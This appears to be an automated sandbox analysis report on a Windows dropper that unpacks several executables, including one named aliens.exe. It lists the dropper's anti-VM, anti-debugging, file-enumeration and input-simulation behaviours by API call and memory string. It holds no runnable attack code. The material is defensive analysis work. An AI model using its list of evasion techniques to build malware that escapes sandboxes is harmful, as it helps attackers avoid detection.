Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0044407819_2_00444078
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_100202D019_2_100202D0
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,19_2_10019780
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeDropped PE file which has not been started: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\hjjgaa.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\SSSS.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\BTRSetp.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\askinstall21.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\file1.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\ubisoftpro.exeJump to dropped file
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\85F91A36E275562F.exeJump to dropped file
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_100202D019_2_100202D0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe TID: 5720Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_100223C0 GetLocalTime followed by cmp: cmp ecx, 01h and CTI: jl 10022474h19_2_100223C0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_100223C0 GetLocalTime followed by cmp: cmp edx, 08h and CTI: jnle 10022474h19_2_100223C0
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC29A3 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00EC29A3
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED0BA0 SendDlgItemMessageW,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00ED0BA0
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EDFB78 FindFirstFileExA,0_2_00EDFB78
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED2E67 VirtualQuery,GetSystemInfo,FindFirstFileExA,0_2_00ED2E67
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_012746B9 __EH_prolog3_GS,GetFullPathNameA,__cftof,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,_strlen,1_2_012746B9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_10009DF3 _memset,GetEnvironmentVariableW,_wprintf,FindFirstFileW,__snprintf_s,FindNextFileW,FindClose,1_2_10009DF3
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,15_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_00406301 FindFirstFileW,FindClose,15_2_00406301
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEE0F62 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,15_2_6FEE0F62
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FED1C23 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,15_2_6FED1C23
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0005A534 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,17_2_0005A534
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0006B820 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,17_2_0006B820
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0007A928 FindFirstFileExA,17_2_0007A928
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,19_2_00452126
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,19_2_0045C999
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,19_2_00436ADE
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00434BEE
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0045DD7C FindFirstFileW,FindClose,19_2_0045DD7C
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,19_2_0044BD29
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,19_2_00436D2D
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00442E1F
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,19_2_00475FE5
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_0044BF8D
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1001A170 FindFirstFileA,FindClose,19_2_1001A170
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED2E67 VirtualQuery,GetSystemInfo,FindFirstFileExA,0_2_00ED2E67
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW9x
Source: WerFault.exe, 00000007.00000002.282007693.0000000004742000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWx
Source: WerFault.exe, 00000004.00000002.256297589.00000000051C0000.00000002.00000001.sdmp, WerFault.exe, 00000007.00000002.282285253.0000000004B00000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 00000004.00000002.256232825.00000000050ED000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW-
Source: WerFault.exe, 00000004.00000003.253459157.0000000005187000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000002.281941675.0000000004685000.00000004.00000001.sdmp, aliens.exe, 00000013.00000002.508576720.0000000000BB7000.00000004.00000020.sdmp, jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
Source: aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW(X
Source: aliens.exe, 00000013.00000002.507967540.00000000008CC000.00000004.00000001.sdmpBinary or memory string: VMware Virtual disk 2.0
Source: aliens.exe, 00000013.00000002.507967540.00000000008CC000.00000004.00000001.sdmpBinary or memory string: VMware
Source: WerFault.exe, 00000004.00000002.256297589.00000000051C0000.00000002.00000001.sdmp, WerFault.exe, 00000007.00000002.282285253.0000000004B00000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 00000004.00000002.256297589.00000000051C0000.00000002.00000001.sdmp, WerFault.exe, 00000007.00000002.282285253.0000000004B00000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: jg2_2qua.exe, 0000001A.00000003.498781258.00000000040A8000.00000004.00000001.sdmpBinary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20200930T144711Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=93ad7adba3804ae29988afa9c571d584&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663612&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663612&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: WerFault.exe, 00000004.00000002.256297589.00000000051C0000.00000002.00000001.sdmp, WerFault.exe, 00000007.00000002.282285253.0000000004B00000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\WerFault.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)Show sources
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent,19_2_10019FF0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01269311 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z,__EH_prolog3,LdrInitializeThunk,1_2_01269311
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EDD6D2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00EDD6D2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_0126294A OutputDebugStringA,GetLastError,1_2_0126294A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_012865B6 VirtualProtect ?,-00000001,00000104,?,?,?,0000001C1_2_012865B6
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01262070 IsBadReadPtr,LoadLibraryA,GetProcAddress,IsBadReadPtr,Sleep,1_2_01262070
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EDC507 mov eax, dword ptr fs:[00000030h]0_2_00EDC507
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEF2571 mov eax, dword ptr fs:[00000030h]15_2_6FEF2571
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEF80EB mov eax, dword ptr fs:[00000030h]15_2_6FEF80EB
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_00077363 mov eax, dword ptr fs:[00000030h]17_2_00077363
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_004175F6 mov eax, dword ptr fs:[00000030h]19_2_004175F6
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10019DE0 mov eax, dword ptr fs:[00000030h]19_2_10019DE0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10019E10 mov eax, dword ptr fs:[00000030h]19_2_10019E10
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10019E10 mov eax, dword ptr fs:[00000030h]19_2_10019E10
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10019E70 mov eax, dword ptr fs:[00000030h]19_2_10019E70
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10019E70 mov eax, dword ptr fs:[00000030h]19_2_10019E70
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10019ED0 mov eax, dword ptr fs:[00000030h]19_2_10019ED0
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EE07E0 GetProcessHeap,0_2_00EE07E0
Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess created: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe' -sJump to behavior
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED3FBC SetUnhandledExceptionFilter,0_2_00ED3FBC
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED431B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00ED431B
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EDD6D2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00EDD6D2
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED3E2A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00ED3E2A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01289B5E SetUnhandledExceptionFilter,1_2_01289B5E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01289B8F SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_01289B8F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_10086DCE SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_10086DCE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEDFB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_6FEDFB78
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEE52CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_6FEE52CE
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0006EEB3 SetUnhandledExceptionFilter,17_2_0006EEB3
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0006F07B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_0006F07B
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_000784EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_000784EF
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0006ED65 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0006ED65
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0042202E SetUnhandledExceptionFilter,19_2_0042202E
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_004230F5 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_004230F5
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00421FA7
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,19_2_10015354
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,19_2_10015376
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,19_2_10018413
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_1000E44D
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_1000EFFC
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0043916A LogonUserW,19_2_0043916A
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,19_2_0040D6D0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,19_2_004375B0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,19_2_00436431
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe' Jump to behavior
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe' Jump to behavior
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeProcess created: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe 'C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe' Jump to behavior
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,19_2_00445DD3
Source: KeJ7Cl7flZ.exe, 00000000.00000002.509070040.00000000039C0000.00000002.00000001.sdmp, aliens.exe, jg2_2qua.exe, 0000001A.00000002.508050417.0000000000DF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: KeJ7Cl7flZ.exe, 00000000.00000002.509070040.00000000039C0000.00000002.00000001.sdmp, aliens.exe, 00000013.00000002.508783062.0000000001AF0000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.508050417.0000000000DF0000.00000002.00000001.sdmpBinary or memory string: Progman
Source: KeJ7Cl7flZ.exe, 00000000.00000002.509070040.00000000039C0000.00000002.00000001.sdmp, aliens.exe, 00000013.00000002.508783062.0000000001AF0000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.508050417.0000000000DF0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
Source: aliens.exe, 00000013.00000002.507373439.0000000000482000.00000002.00020000.sdmp, 85F91A36E275562F.exe.19.drBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: KeJ7Cl7flZ.exe, 00000000.00000002.509070040.00000000039C0000.00000002.00000001.sdmp, aliens.exe, 00000013.00000002.508783062.0000000001AF0000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.508050417.0000000000DF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
Source: KeJ7Cl7flZ.exe, 00000000.00000002.509070040.00000000039C0000.00000002.00000001.sdmp, aliens.exe, 00000013.00000002.508783062.0000000001AF0000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.508050417.0000000000DF0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC6951 cpuid 0_2_00EC6951
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00ECF8F6
